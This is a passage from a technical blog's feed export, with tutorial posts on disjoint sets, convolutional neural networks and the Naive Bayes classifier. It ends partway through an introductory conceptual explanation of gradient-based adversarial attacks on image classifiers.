<p>Now we read in the data of how the junctions connected. Such as&#xA0;<code>1 -- 3</code>, we need to change the parent of one node to another (whatever it is node 1 or node 3). The diagram illustrate the result of disjoint sets after alternation.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/bad106e3e51b1e92e2ce46d969d693fa.js"></script>
<!--kg-card-end: html-->
<figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/disjoint-3.png" class="kg-image" alt="Disjoint Set: City Connection Problem" loading="lazy" width="598" height="554"></figure><p>Okay, seems easy. Let us do the next link,&#xA0;<code>1 -- 2</code>. Follow with the rules of tree, a node in a tree can only have one parent. If we change the parent of node 1 to node 2, node 3 could no longer be parent of node 1, which causes loss of information. The solution is pretty straight-forward, since each root node have parent node as themselves. Since each group of interconnected nodes can be identified by different root nodes, if node 2 want to join the group which having root node is node 3, then just simply change the parent of node 3 (group root node) to node 2.</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/disjoint-4.png" class="kg-image" alt="Disjoint Set: City Connection Problem" loading="lazy" width="626" height="560" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/disjoint-4.png 600w, https://www.aspires.cc/content/images/2024/05/disjoint-4.png 626w"></figure><blockquote><strong>Here are the rules:</strong><br><br>1. If we are going to link two nodes which are in different groups (single node is also considered as a group), link the root nodes of each groups together.<br><br>2. If we are going to link two nodes which are in the same group (having the same group root node), do nothing.</blockquote><p>The Python code for finding a group&apos;s root node is:</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/82ff95f760e08db5b2d4f0fb5d224cb3.js"></script>
<!--kg-card-end: html-->
<p>By applying the rule, we can finally get following trees after linked&#xA0;<code>6 -- 7</code>:</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/disjoint-full.png" class="kg-image" alt="Disjoint Set: City Connection Problem" loading="lazy" width="1600" height="1035" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/disjoint-full.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/disjoint-full.png 1000w, https://www.aspires.cc/content/images/2024/05/disjoint-full.png 1600w" sizes="(min-width: 720px) 720px"></figure><p>In the final result,&#xA0;<code>6 -- 7</code>, we have two groups, root node 4 and root node 7. Back to the question, to check if node 4 and node 7 are interconnected, we need to check if&#xA0;<code>parent_of(4)</code>&#xA0;is equal to&#xA0;<code>parent_of(7)</code>.</p><p>However, currently, the worse case of disjoint sets is that trees are builded as a linked list (degenerate into a chain), as the example given. The time complexity is still similar to that of utilizing search algorithms. To tackle the issue, we must update the current disjoint set into a 1-depth tree, as illustrated in the following figure.</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/path-compress.png" class="kg-image" alt="Disjoint Set: City Connection Problem" loading="lazy" width="1600" height="623" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/path-compress.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/path-compress.png 1000w, https://www.aspires.cc/content/images/2024/05/path-compress.png 1600w" sizes="(min-width: 720px) 720px"></figure><p>The following updated&#xA0;<code>parent_of(node)</code>&#xA0;function can implement this action</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/12f64c1f76675859c204fcc27650c7fb.js"></script>
<!--kg-card-end: html-->
<div class="kg-card kg-toggle-card" data-kg-toggle-state="close">
            <div class="kg-toggle-heading">
                <h4 class="kg-toggle-heading-text"><span style="white-space: pre-wrap;">Algorithms that Disjoint Set inspires</span></h4>
                <button class="kg-toggle-card-icon" aria-label="Expand toggle to read content">
                    <svg id="Regular" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 24 24">
                        <path class="cls-1" d="M23.25,7.311,12.53,18.03a.749.749,0,0,1-1.06,0L.75,7.311"/>
                    </svg>
                </button>
            </div>
            <div class="kg-toggle-content"><p><span style="white-space: pre-wrap;">The Kruskal algorithm in minimum spanning tree and the Tarjan algorithm in least common ancestor (LCA) are both based on the disjoint-set data structure. A disjoint-set is a data structure used for solving the union-find problem, which involves partitioning elements into disjoint sets and supporting queries to determine if two elements are in the same set.</span></p></div>
        </div><p>When we utilize path compression to obtain disjoint sets, the time complexity of checking if two nodes are interconnected becomes optimized to the level of the tree, which is $O(\alpha(n))$.</p><p>The average time complexity for each operation in a disjoint-set data structure is only $O(\alpha(n))$, where $\alpha$ is the inverse of the Ackermann function. The growth of $\alpha(n)$ is extremely slow, meaning that the average running time for a single operation can be considered a very small constant <sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>.</p>
<p>The definition of the Ackermann function $A(m, n)$ is:</p>
<p>$$<br>
A(m, n) =<br>
\begin{cases}<br>
n+1&amp;\text{if }m=0 \\<br>
A(m-1,1)&amp;\text{if }m&gt;0\text{ and }n=0 \\<br>
A(m-1,A(m,n-1))&amp;\text{otherwise}<br>
\end{cases}<br>
$$</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p><a href="https://oi-wiki.org/ds/dsu/?ref=aspires.cc">https://oi-wiki.org/ds/dsu/</a> <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
]]></content:encoded></item><item><title><![CDATA[Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns]]></title><description><![CDATA[In the last post, we discussed Neural Networks and how they simulate neurons. Now, we'll introduce Convolutional Neural Networks (CNNs), which have an advanced architecture and can automatically extract features.]]></description><link>https://www.aspires.cc/conv-neural-networks/</link><guid isPermaLink="false">66497323da27ac0001efd646</guid><category><![CDATA[Machine Learning]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Sat, 29 Apr 2023 00:00:00 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/05/cnn.png" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.aspires.cc/neural-networks/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Implementing Neural Networks from Scratch</div><div class="kg-bookmark-description">In this post, we&#x2019;ll understand how neural networks work while implementing one from scratch in Python.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://aspires.cc/content/images/size/w256h256/2023/04/aspire-mono-margin.png" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns"><span class="kg-bookmark-author">Aspires</span><span class="kg-bookmark-publisher">Ex10si0n Yan</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://aspires.cc/content/images/2022/10/relations-1-2.png" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns"></div></a></figure><img src="https://www.aspires.cc/content/images/2024/05/cnn.png" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns"><p>In the previous post, we introduced how a Neural Network learns in aspect of mathematical simulation of neurons. In this post, we will introduce the advanced architecture of neuron networks - Convolution Neural Networks - which, in some aspect, forms a vision that can extract features&#xA0;<strong>automatically</strong>.</p><h1 id="filtering-kernels">Filtering &amp; Kernels</h1><p>In the area of Digital Image Processing, it is well-known that there are many kinds of filters to fulfill a specific kind of work, such as border detection, blurring, sharpening, etc.&#xA0;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/mnist.png" class="kg-image" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns" loading="lazy" width="2000" height="1049" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/mnist.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/mnist.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/mnist.png 1600w, https://www.aspires.cc/content/images/size/w2400/2024/05/mnist.png 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">CNN can classify MNIST dataset</span></figcaption></figure><p>As an example of applying border detection on a grayscale image, <strong>the Sobel and Laplacian Edge Detectors</strong>&#xA0;can detect the border (sudden change of pixel values) via the filter, or say kernel, for the Laplacian operator:</p><p>$$\begin{bmatrix} -1 &amp; -1 &amp; -1 \\ -1 &amp; 8 &amp; -1 \\ -1 &amp; -1 &amp; -1 \end{bmatrix} $$</p><p>The filter then be applied to the image as sliding window, as shown in the animation below:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/conv.gif" class="kg-image" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns" loading="lazy" width="1170" height="849" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/conv.gif 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/conv.gif 1000w, https://www.aspires.cc/content/images/2024/05/conv.gif 1170w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">2D Sliding Window</span></figcaption></figure><p>What happens in each filtering (white box in the front) follows the below calculation:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/conv-calc.gif" class="kg-image" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns" loading="lazy" width="960" height="540" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/conv-calc.gif 600w, https://www.aspires.cc/content/images/2024/05/conv-calc.gif 960w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Calculation in Image Filtering</span></figcaption></figure><p>Due to the characteristics <sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> of kernel design, borders could be detected as shown in the image below.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p><a href="https://homepages.inf.ed.ac.uk/rbf/HIPR2/log.htm?ref=aspires.cc">https://homepages.inf.ed.ac.uk/rbf/HIPR2/log.htm</a> <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/image.jpg" class="kg-image" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns" loading="lazy" width="2000" height="2000" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/image.jpg 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/image.jpg 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/image.jpg 1600w, https://www.aspires.cc/content/images/2024/05/image.jpg 2000w" sizes="(min-width: 720px) 720px"></figure><h1 id="convolution">Convolution</h1><p>Image filtering and convolution are two closely related concepts used in image processing, however; they have a slightly difference:</p><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/conv-formula.png" class="kg-image" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns" loading="lazy" width="893" height="359" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/conv-formula.png 600w, https://www.aspires.cc/content/images/2024/05/conv-formula.png 893w" sizes="(min-width: 720px) 720px"></figure><p>The convolution operation moves the input image to desired time (you can regard it as <strong>going cross-wise rather than parallel*</strong>, since the term time in signal processing represents time-frequency related to spatial-frequency)</p><p>To a better understanding, it doesn&apos;t matter to regard convolution as a way of filtering since the key here is to <strong>shrink the size of image while retraining its features</strong> as much as possible.</p><h1 id="fully-automatic-on-parameter-optimizing">Fully Automatic on Parameter Optimizing</h1><p>By recapping the <strong>gradient descent</strong> in training a Neural Network, we know that:</p><ul><li>Learning is in fact <strong>minimizing the loss</strong> automatically</li><li>The loss is determined by <strong>data (X), label (y), weights and bias (W, b)</strong></li><li><strong>Data(X), and label(y) </strong>cannot be change (usually) since they are ground truth</li><li>The network parameters <strong>weights and bias (W, b)</strong> can be changed to optimize the performance of that network</li><li>In back-propagation, <strong>weights and bias (W, b)</strong> are descent by gradient of loss with respect to each weight and bias respectively</li></ul><p>Hence, the Neural Net can learn by changing its <strong>network parameters</strong>, i.e. weights and bias (W, b).</p><h2 id="so-how-to-determine-the-kernel">So How to Determine the Kernel?</h2><p>By the <strong>gradient descent</strong>, the neural network can learned by updating its parameters. However, the CNN architecture is firstly comes with Convolutional Layers, connected with a Fully Connected Layer, or say deep neural network. Note that the Convolutional Layers contain kernel for each specific layers, the kernel is simply set as a random matrix. The key point is each kernel can be also updated by the <strong>gradient descent</strong>: </p><blockquote>During the training process, each entry of the kernel is updated by calculating the partial derivative of the loss function with respect to that entry of the kernel.</blockquote><p>Wow, the kernels can also learn by itself. As different training data, the kernel can be formed to a specific matrix which are relatively optimal to the specific task regardless to classification and segmentation.</p><h1 id="extracting-features-and-poolings">Extracting Features and Poolings</h1><p>Although CNN can handle the task other than images, we simply use the most classical task - image classification - to illustrate the process. A colored image is usually adopting RGB format, which contains three channels, Red, Green, Blue, respectively. The image of Lena is a classical computer image processing example, the following are the RGB channels, for example, the Red channel have only the magnitude of red color, the lighter pixel the higher magnitude it is. The colored image of Lena is the composition of magnitudes of the three color channels.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/lena-rgb.jpg" class="kg-image" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns" loading="lazy" width="720" height="487" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/lena-rgb.jpg 600w, https://www.aspires.cc/content/images/2024/05/lena-rgb.jpg 720w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">RGB Extraction</span></figcaption></figure><p>For a CNN, to handle the colored image, we usually apply a 3 channel to n channel convlution layer firstly. In the following diagram, each <strong>black b0x is a kernel</strong>.</p><blockquote>To simplified, we set all the kernel to 3x3, hence 26x26 image can be reduced to 24x24 since no image paddings are used.</blockquote><figure class="kg-card kg-image-card"><img src="https://www.aspires.cc/content/images/2024/05/cnn-arch.png" class="kg-image" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns" loading="lazy" width="2000" height="487" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/cnn-arch.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/cnn-arch.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/cnn-arch.png 1600w, https://www.aspires.cc/content/images/2024/05/cnn-arch.png 2068w" sizes="(min-width: 720px) 720px"></figure><p>In the first step <strong>(Conv 26x26x3 -&gt; 24x24x6)</strong>, a 26x26x3 image are turned into a 24x24x6 image. The process is conducted by 6 (1) different (initialized by random) 3x3x3 (2) convolution kernels.</p><ol><li>6 kernels can generate 6 different 2D <strong>features </strong>(we usually regard the images in the middle process as <strong>features</strong>).</li><li>Note that the 3x3x3 is designed by (kernel width, kernel height, kernel channels). The 3x3x3 kernel is a 3D kernel to calculate convolution for each RGB channels of the original images respectively.</li></ol><p>Then, the next step <strong>(Pool 24x24x6 -&gt; 12x12x6)</strong>, let us use a max-pool to illustrate the process. Pooling is the same as Subsampling, which, retrain only the representative such as the maximum in a kernel size matrix. It is clear to see that the image size is divided by the kernel size after applying the pooling.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/pool.gif" class="kg-image" alt="Neural Networks Series II: Forming Vision - How a Convolutional Neural Network Learns" loading="lazy" width="751" height="401" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/pool.gif 600w, https://www.aspires.cc/content/images/2024/05/pool.gif 751w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Pooling, GIF from victorzhou.com</span></figcaption></figure><p>In the previous diagram, we applied further convolution and pooling, which also follow the corresponding process. Finally, the 3x3x12 feature are flattened into a 1x108 linear layer of neurons, then they are connected to classical deep neural network, and a 10 classification results are shown in the output layer (1x10).</p><h1 id="conclusion">Conclusion</h1><p>In this post, we have learned:</p><ul><li>The neural network can extract features from alternating the convolution kernel matrices in the back-propagation process by gradient descent.</li><li>CNN layers are usually containing Convolution and Pooling to shrink the huge size of input neurons.</li><li>After Convolution and Pooling, the features are usually flattened and connected to fully connected layers.</li><li>The CNN architecture employs kenneling and subsampling to simplified the related neighborhood of pixels which could generate data redundancy.</li></ul>]]></content:encoded></item><item><title><![CDATA[Understanding Naïve Bayes Algorithm: Play with Probabilities]]></title><description><![CDATA[Naïve Bayes is a classical machine learning algorithm. By reading this post, you will understand this algorithm and implement a Naïve Bayes classifier for classifying the target customer of an ad. by the features of the customer.]]></description><link>https://www.aspires.cc/naive-bayes/</link><guid isPermaLink="false">664a69b3da27ac0001efd6b6</guid><category><![CDATA[Machine Learning]]></category><category><![CDATA[Algorithms]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Tue, 14 Feb 2023 21:05:00 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/05/naive-bayes.png" medium="image"/><content:encoded><![CDATA[<img src="https://www.aspires.cc/content/images/2024/05/naive-bayes.png" alt="Understanding Na&#xEF;ve Bayes Algorithm: Play with Probabilities"><p>Na&#xEF;ve Bayes Algorithm, mainly refers Multinomial Na&#xEF;ve Bayes Classifier, is a machine learning algorithm for classification. It mathematically based on the Bayes Theorem:</p><p>$$&#x200B;&#x200B;P(\text{class}|\text{feature}) = \frac{P(\text{feature}|\text{class})P(\text{class})}{P(\text{feature})}$$</p><p>It is easy to prove based on some prior knowledge on <strong>Joint probability</strong></p><p>$$P(A\cap B)=P(A|B) \cdot P(B)$$</p><p>$$P(A\cap B)=P(B|A) \cdot P(A)$$</p><p>Hence, we can connect these two formula via $P(A\cap B)$</p><p>$$P(A|B) \cdot P(B) = P(B|A) \cdot P(A)$$</p><p>Divide both side with $P(B)$,</p><p>$$P(A|B) = \frac{P(B|A) \cdot P(A)}{P(B)}$$</p><h1 id="bayes-theorem">Bayes Theorem</h1><p>Here is an exercise on Wikipedia: <strong>Drug testing</strong></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.aspires.cc/content/images/2024/05/confusion-matrix-evidently-ai.png" class="kg-image" alt="Understanding Na&#xEF;ve Bayes Algorithm: Play with Probabilities" loading="lazy" width="1919" height="1080" srcset="https://www.aspires.cc/content/images/size/w600/2024/05/confusion-matrix-evidently-ai.png 600w, https://www.aspires.cc/content/images/size/w1000/2024/05/confusion-matrix-evidently-ai.png 1000w, https://www.aspires.cc/content/images/size/w1600/2024/05/confusion-matrix-evidently-ai.png 1600w, https://www.aspires.cc/content/images/2024/05/confusion-matrix-evidently-ai.png 1919w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Confusion Matrix, Image from Evidently AI</span></figcaption></figure><p>Suppose, a particular test for whether someone has been using cannabis is 90% <a href="https://en.wikipedia.org/wiki/Sensitivity_(tests)?ref=aspires.cc">sensitive</a>, meaning the <a href="https://en.wikipedia.org/wiki/True_positive_rate?ref=aspires.cc">true positive rate</a> (TPR) = 0.90. Therefore, it leads to 90% true positive results (correct identification of drug use) for cannabis users.</p><p>The test is also 80% <a href="https://en.wikipedia.org/wiki/Specificity_(tests)?ref=aspires.cc">specific</a>, meaning <a href="https://en.wikipedia.org/wiki/True_negative_rate?ref=aspires.cc">true negative rate</a> (TNR) = 0.80. Therefore, the test correctly identifies 80% of non-use for non-users, but also generates 20% false positives, or <a href="https://en.wikipedia.org/wiki/False_positive_rate?ref=aspires.cc">false positive rate</a> (FPR) = 0.20, for non-users.</p><p>Assuming 0.05 <a href="https://en.wikipedia.org/wiki/Prevalence?ref=aspires.cc">prevalence</a>, meaning 5% of people use cannabis, what is the <a href="https://en.wikipedia.org/wiki/Probability?ref=aspires.cc">probability</a> that a random person who tests positive is really a cannabis user?</p><p>$$P(pred_T|real_T) = 0.9$$</p><p>$$P(pred_T|real_F) = 0.2$$</p><p>$$P(real_T) = 0.05$$</p><p>find $P(real_T|pred_T) = ?$</p><p>$$P(real_T|pred_T) = \frac{P(pred_T|real_T)P(real_T)}{P(pred_T)}$$</p><p>$$P(pred_T)=P(pred_T|real_T)*P(real_T)+P(pred_T|real_F)*P(real_F)$$</p><p>$$=\frac{0.9*0.05}{0.05*0.9+0.95*0.2}=0.1914893617$$</p><h1 id="classes-and-features">Classes and Features</h1><p>The idea here is to find a class (or say classify) of given features, where class refers to prediction result and features refers all attributes for a specific $X$.</p><p>Note that we let $X_i$ be monthly income, martial status of a person, or frequencies of some words in an email, or number of bedrooms, size, distance from subway of a house (which could determine its renting price). </p><p>Besides, we could let $y$ be a result corresponding to these $X_i$&apos;s, such as monthly income, martial status of a person may infer the willingness of purchasing by an advertisement, frequencies of some words (free, refund, paid, special) could infer the spam email.</p><h2 id="priors">Priors</h2><p>Since we have figured out the $X$ (feature) and $y$ (class), it is clear that we have frequencies of $X$ and $y$ from statistics. Mathematically, they are $P(\text{feature}_i) = \frac{n(\text{feature}_i)}{n(\text{all})} $ and $P(\text{class}) = \frac{n(\text{class})}{n(\text{all})}$. These kind of probabilities are called priors.</p><p>According to the Bayes Theorem which mentioned before:</p><p>$$&#x200B;&#x200B;P(\text{class}|\text{feature}) = \frac{P(\text{feature}|\text{class})P(\text{class})}{P(\text{feature})}$$</p><p>The bridge connects $&#x200B;&#x200B;P(\text{class}|\text{feature})$ and priors are $P(\text{feature}|\text{class})$. But what are they?</p><h2 id="conditional-probability">Conditional Probability</h2><p>In Statistics $P(A|B)$ is conditional probability. $P(A|B)$ is the probability of event $A$ given that event $B$ has occurred. For example, let event B as earthquake, and event A as tsunami. $P(\text{tsunami}|\text{earthquake})$ means when an earthquake happens, the probability of happening a tsunami at the same time. Out of common sense, $P(\text{tsunami}|\text{earthquake})$ is lower when the location of earthquake is far from a coast.</p><p>Back to the feature-class, $&#x200B;&#x200B;P(\text{class}|\text{feature})$ and $P(\text{feature}|\text{class})$ refer to two different condition, obviously. Let us make the feature-class be:</p><p>$A=P(\text{is spam}|\text{free, refund, paid, special})$ means when a email contains these words: free, refund, paid, special; the probability of it is a spam.</p><p>$B=P(\text{free, refund, paid, special}|\text{is spam})$ means when a email is spam (we have already know that), the probability of it containing these words: free, refund, paid, special.</p><h2 id="posteriors">Posteriors</h2><p>From the previous A and B, we know that B can be easily calculated from given data (in machine learning, we always have some lines of data as input of algorithms), which is &quot;empirical&quot;. </p><p>While A refers the probability of the email is a spam if  given data contains free, refund, paid, special. When the system read an email, and get the vocabulary frequency, it could have these situations:</p><pre><code>free       contains | not contains
refund     contains | not contains
paid       contains | not contains
special    contains | not contains</code></pre><p>There could be $2^4$ possible combinations of the 4 words. For all emails, they must meet one of the combinations of these words. Hence, we can get a True-False attributes set for the 4 words. </p><p>For example, (True, True, True, False) indicates that email contains &quot;free&quot;, &quot;refund&quot;, &quot;paid&quot; but not contains &quot;special&quot;. Then we can get two possibilities.</p><p>$$C = P(\text{is spam}|\text{free, refund, paid, not special})$$</p><p>$$D = P(\text{is not spam}|\text{free, refund, paid, not special})$$</p><p>The task, to find out if the email contains free, refund, paid, but not contains special is a spam, could be converted into find $\max(C, D)$. If C is larger, the email is higher likely to be a spam. Then the classifier could tell the probability of the email contains free, refund, paid, but not contains special is a spam (such as 75%).</p><h1 id="integration">Integration</h1><p>The class-feature $P(\text{class}|\text{feature})$ works as classifier, and it is calculated by Bayes Theorem:</p><p>$$&#x200B;&#x200B;P(\text{class}|\text{feature}) = \frac{P(\text{feature}|\text{class})P(\text{class})}{P(\text{feature})}$$</p><p>The training process could be mathematically converted into calculation by the given formula.</p><p>With the aid of following formulas</p><p>$$P(\text{f}|\text{c}) = P(\text{f}_1|\text{c}) \times P(\text{f}_2|\text{c}) \times ... \times P(\text{f}_n|\text{c})$$</p><p>$$P(\text{f}) = P(\text{f}_1) \times P(\text{f}_2) \times ... \times P(\text{f}_n)$$</p><p>We could cumprod each probabilities and get the posteriors easily.</p><h1 id="implementation">Implementation</h1><p>The code implements a Na&#xEF;ve Bayes classifier for finding out if a user will purchase from the advertisement from given features: gender, age, estimation salary.</p><p>The data could be downloaded from: <a href="https://raw.githubusercontent.com/Ex10si0n/machine-learning/main/naive-bayes/data.csv?ref=aspires.cc">https://raw.githubusercontent.com/Ex10si0n/machine-learning/main/naive-bayes/data.csv</a></p><pre><code class="language-bash">wget https://raw.githubusercontent.com/Ex10si0n/machine-learning/main/naive-bayes/data.csv</code></pre><h2 id="data-preprocessing">Data Preprocessing</h2><p>The provided code reads data from a CSV file, separates the headers and data, splits it into training and testing sets, and further splits them into features and labels.</p>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/53db33bcbc0acd50a88878c44d2d1432.js"></script>
<!--kg-card-end: html-->
<h2 id="calculate-all-of-the-conditional-probabilities">Calculate all of the conditional probabilities</h2>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/c64b395d25abe194b2a7d2493eec41de.js"></script>
<!--kg-card-end: html-->
<h2 id="calculate-all-of-the-priors">Calculate all of the priors</h2>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/23d97b68f844402dda51bcabf2e564ad.js"></script>
<!--kg-card-end: html-->
<h2 id="applying-the-bayes-theorem">Applying the Bayes Theorem</h2>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/4b0a2ee03c4bbb2742c78eddc1463479.js"></script>
<!--kg-card-end: html-->
<h2 id="result">Result</h2>
<!--kg-card-begin: html-->
<script src="https://gist.github.com/Ex10si0n/3a89f56e7cd1c8836cf6e7f947e7be3f.js"></script>
<!--kg-card-end: html-->
<p>View full code here:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/Ex10si0n/machine-learning/tree/main/naive-bayes?ref=aspires.cc"><div class="kg-bookmark-content"><div class="kg-bookmark-title">machine-learning/naive-bayes at main &#xB7; Ex10si0n/machine-learning</div><div class="kg-bookmark-description">Tutorial of Python Machine Learning Implementation on Linux - machine-learning/naive-bayes at main &#xB7; Ex10si0n/machine-learning</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Understanding Na&#xEF;ve Bayes Algorithm: Play with Probabilities"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">Ex10si0n</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/e3285b8462fb1653cb02b92a13e0b6cd4f1f639dd5617b61911757df069d0f76/Ex10si0n/machine-learning" alt="Understanding Na&#xEF;ve Bayes Algorithm: Play with Probabilities"></div></a></figure><h1 id="conclusion">Conclusion</h1><p>Na&#xEF;ve Bayes is a fast and simple algorithm that requires a little training data, making it suitable for large datasets or data with limited labeled examples. It also has the advantage of being able to handle multiple classes, making it a popular choice for text classification and spam filtering.</p><p>In conclusion, Na&#xEF;ve Bayes is a simple yet powerful algorithm that is widely used in many real-world applications. Despite its &quot;na&#xEF;ve&quot; assumption of independent features, it has proven to be a reliable method for classification in many scenarios.</p>]]></content:encoded></item><item><title><![CDATA[Gradient Attack: A Brief Explanation on Adversarial Attack]]></title><description><![CDATA[The main components of the neural network are the feedforward and backpropagation algorithms. These algorithms help update the loss values in each iteration. To intentionally misclassify the model, we can add an inverse gradient that is calculated by the model's parameters on the input data.]]></description><link>https://www.aspires.cc/adversarial-attack/</link><guid isPermaLink="false">664a6f22da27ac0001efd6e2</guid><category><![CDATA[Machine Learning]]></category><dc:creator><![CDATA[Ex10si0n Yan]]></dc:creator><pubDate>Thu, 01 Dec 2022 21:32:00 GMT</pubDate><media:content url="https://www.aspires.cc/content/images/2024/05/adv-attack.png" medium="image"/><content:encoded><![CDATA[<img src="https://www.aspires.cc/content/images/2024/05/adv-attack.png" alt="Gradient Attack: A Brief Explanation on Adversarial Attack"><p>The core implementation of the neural network is feedforward and backpropagation. Feedforward passes a series of inputs enter the layer, and these inputs are multiplied by the weights. Each value is then added together to get a sum of the weighted input values. It often works with activation functions to scale the classification sensitivity in each neuron.</p><p>If you are not familiar with deep learning and neural networks, I highly recommend you to read the previous post: <strong>Implementing Neural Networks from Scratch</strong></p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.aspires.cc/neural-networks/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Implementing Neural Networks from Scratch</div><div class="kg-bookmark-description">In this post, we&#x2019;ll understand how neural networks work while implementing one from scratch in Python.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="http://localhost:2370/content/images/size/w256h256/2022/10/aspire-wbg-2.png" alt="Gradient Attack: A Brief Explanation on Adversarial Attack"><span class="kg-bookmark-author">Aspires - Ex10si0n</span><span class="kg-bookmark-publisher">Ex10si0n</span></div></div><div class="kg-bookmark-thumbnail"><img src="http://localhost:2370/content/images/2022/10/relations-1-2.png" alt="Gradient Attack: A Brief Explanation on Adversarial Attack"></div></a></figure><p>Backpropagation is for computing the gradients rapidly. In short, what backpropagation does for us is gradient (slope in higher dimensions) calculation. The procedure is straightforward; by adjusting the weights and biases throughout the network, the desired output could be produced from the network. For example, if the output neuron is 0, adjust the weights and biases inside the network to get an output closer to 0. This process is done by minimizing the loss, which needs to be descent by referencing the gradient on the loss function on each parameter (i.e., weights and biases) of every single neuron in the network.</p><p>Calculating the gradient in backpropagation could be influenced by each input data X. Usually, the parameters (weights and biases) in the network are adjusted according to the gradient calculated in backpropagation to minimize the loss function. Inversely, the loss is more considerable when the parameters are adjusted to maximize the loss function by going up in the opposite direction.</p><h1 id="adversarial-attacks">Adversarial Attacks</h1><p>The adversarial vulnerability of deep neural networks has attracted considerable attention in recent years. The adversarial attack is a technique that can deviate the results of Neural Network models to produce wrong predictions&#x2014;for example, shown in Figure 1, consider that we have a photo of a panda and a CNN model that can accurately categorize a panda image as a label of class &#x201C;panda&#x201D;. Adversarial attack techniques (e.g., Fast Gradient Sign Method, 1-pixel attack, and PGD-based attack) can produce a perturbed panda image, called adversarial examples, based on the panda image given and parameters from the CNN classifier. The difference between the adversarial example and the original image from the dataset is hard to observe by human perception. Nevertheless, the CNN classifier wrongly classifies the perturbed image of the panda as 